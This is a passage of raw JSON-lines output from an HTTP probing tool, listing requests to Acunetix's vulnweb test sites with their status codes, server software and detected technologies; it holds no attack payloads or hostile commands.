Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.195694969Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/robots.txt\",\"input\":\"http://testaspnet.vulnweb.com/robots.txt\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/robots.txt\",\"time\":\"343.876518ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":13,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.200403762Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/rssFeed.aspx\",\"input\":\"http://testaspnet.vulnweb.com/rssFeed.aspx\",\"title\":\"Acunetix testaspnet\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/rssFeed.aspx\",\"time\":\"343.97531ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":655,\"lines\":55,\"status_code\":200,\"content_length\":2118,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.228297892Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/styles.css\",\"input\":\"http://testaspnet.vulnweb.com/styles.css\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/styles.css\",\"time\":\"351.730399ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":147,\"lines\":154,\"status_code\":200,\"content_length\":2597,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.244252389Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/test/vuln.cgi\",\"input\":\"http://testaspnet.vulnweb.com/test/vuln.cgi\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/test/vuln.cgi\",\"time\":\"352.412771ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.244248681Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/styles.css’\",\"input\":\"http://testaspnet.vulnweb.com/styles.css%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/styles.css%E2%80%99\",\"time\":\"357.132458ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.269233959Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/test/vuln.cgi?par1\",\"input\":\"http://testaspnet.vulnweb.com/test/vuln.cgi?par1=\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/test/vuln.cgi?par1\",\"time\":\"348.61704ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.272493052Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/test/vuln.cgi?par1=val1\\u0026par1=val2\",\"input\":\"http://testaspnet.vulnweb.com/test/vuln.cgi?par1=val1\\u0026par1=val2\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/test/vuln.cgi?par1=val1\\u0026par1=val2\",\"time\":\"352.652179ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.283354684Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/test/vuln.cgi?par1=val1\\u0026par2=val2\",\"input\":\"http://testaspnet.vulnweb.com/test/vuln.cgi?par1=val1\\u0026par2=val2\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/test/vuln.cgi?par1=val1\\u0026par2=val2\",\"time\":\"356.620223ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.300226335Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/login.aspx\",\"input\":\"http://testaspnet.vulnweb.com/login.aspx\",\"title\":\"login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/login.aspx\",\"time\":\"524.978638ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":612,\"lines\":109,\"status_code\":200,\"content_length\":13423,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.312841322Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/was.swf\",\"input\":\"http://testaspnet.vulnweb.com/was.swf\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/was.swf\",\"time\":\"351.946707ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.446456231Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com\",\"input\":\"http://testhtml5.vulnweb.com\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"353.118693ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.466330216Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/\",\"input\":\"http://testhtml5.vulnweb.com/\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"344.190998ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:03.381341823Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"input\":\"http://testhtml5.vulnweb.com/.carousel\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.carousel\",\"time\":\"343.477474ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:03.390083996Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/•\",\"input\":\"http://testhtml5.vulnweb.com/%E2%80%A2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%E2%80%A2\",\"time\":\"351.786897ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:10.35119353Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/.carousel-inner\",\"input\":\"http://testhtml5.vulnweb.com/.carousel-inner\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.carousel-inner\",\"time\":\"356.032878ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:10.402168024Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/.well\",\"input\":\"http://testhtml5.vulnweb.com/.well\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.well\",\"time\":\"339.960536ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:10.405387382Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/.fluid-container\",\"input\":\"http://testhtml5.vulnweb.com/.fluid-container\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.fluid-container\",\"time\":\"352.48219ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.365824678Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/admin/\",\"input\":\"http://testhtml5.vulnweb.com/admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/\",\"time\":\"340.702138ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Basic\",\"Nginx:1.19.0\"],\"words\":15,\"lines\":2,\"status_code\":401,\"content_length\":90,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.377818248Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/about\",\"input\":\"http://testhtml5.vulnweb.com/about\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/about\",\"time\":\"356.754986ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.529199475Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"input\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/archive\",\"time\":\"347.516198ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.601139544Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/latest?offset\",\"input\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest?offset\",\"time\":\"351.015542ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.795120873Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=0\",\"input\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=0\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest?offset=0\",\"time\":\"352.733939ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.822483242Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=10\",\"input\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=10\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest?offset=10\",\"time\":\"339.366868ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.864590701Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=15\",\"input\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=15\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest?offset=15\",\"time\":\"364.786707ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.943122877Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=5\",\"input\":\"http://testhtml5.vulnweb.com/ajax/latest?offset=5\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest?offset=5\",\"time\":\"344.445407ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:11.979900582Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/like?id\",\"input\":\"http://testhtml5.vulnweb.com/ajax/like?id=\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/like?id\",\"time\":\"354.97621ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.006591279Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular\",\"time\":\"352.125393ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.280151673Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular?offset\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset\",\"time\":\"343.357685ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.351570374Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=0\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=0\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset=0\",\"time\":\"348.49134ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.399392053Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=10\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=10\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset=10\",\"time\":\"352.62971ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.545902757Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=20\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=20\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset=20\",\"time\":\"342.930195ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.545991665Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=15\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=15\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset=15\",\"time\":\"348.147311ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.578214264Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=5\",\"input\":\"http://testhtml5.vulnweb.com/ajax/popular?offset=5\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset=5\",\"time\":\"345.054273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.585634219Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/all/filter/:filter\",\"input\":\"http://testhtml5.vulnweb.com/all/filter/:filter\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/all/filter/:filter\",\"time\":\"339.275715ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.603212992Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/archive\",\"input\":\"http://testhtml5.vulnweb.com/archive\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/archive\",\"time\":\"357.124119ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.612649352Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/carousel\",\"input\":\"http://testhtml5.vulnweb.com/carousel\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/carousel\",\"time\":\"340.723174ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.629740359Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/comment?id=011dc54012e965efaf58a4fc21785602\",\"input\":\"http://testhtml5.vulnweb.com/comment?id=011dc54012e965efaf58a4fc21785602\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment?id=011dc54012e965efaf58a4fc21785602\",\"time\":\"343.789245ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":899,\"lines\":101,\"status_code\":200,\"content_length\":4497,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.643614986Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/comment?id=0361ec55570dbf90305322914eff6fab\",\"input\":\"http://testhtml5.vulnweb.com/comment?id=0361ec55570dbf90305322914eff6fab\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment?id=0361ec55570dbf90305322914eff6fab\",\"time\":\"349.938903ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":899,\"lines\":101,\"status_code\":200,\"content_length\":4497,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.665332272Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/comment?id=24e47eb911c4d9526f32bf4f7db3e47b\",\"input\":\"http://testhtml5.vulnweb.com/comment?id=24e47eb911c4d9526f32bf4f7db3e47b\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment?id=24e47eb911c4d9526f32bf4f7db3e47b\",\"time\":\"353.582747ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":899,\"lines\":101,\"status_code\":200,\"content_length\":4497,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.678943785Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/comment?id=287458f26278ec644c4588be49dc13d1\",\"input\":\"http://testhtml5.vulnweb.com/comment?id=287458f26278ec644c4588be49dc13d1\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment?id=287458f26278ec644c4588be49dc13d1\",\"time\":\"356.208116ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":899,\"lines\":101,\"status_code\":200,\"content_length\":4497,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.812078412Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/comment?id=2d378ee65f2095fab6db54fd7ba9e230\",\"input\":\"http://testhtml5.vulnweb.com/comment?id=2d378ee65f2095fab6db54fd7ba9e230\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment?id=2d378ee65f2095fab6db54fd7ba9e230\",\"time\":\"352.544578ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":899,\"lines\":101,\"status_code\":200,\"content_length\":4497,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:12.837742508Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/comment?id=3bf174abb37bee6983637c6c2c63c5ac\",\"input\":\"http://testhtml5.vulnweb.com/comment?id=3bf174abb37bee6983637c6c2c63c5ac\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment?id=3bf174abb37bee6983637c6c2c63c5ac\",\"time\":\"353.994628ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\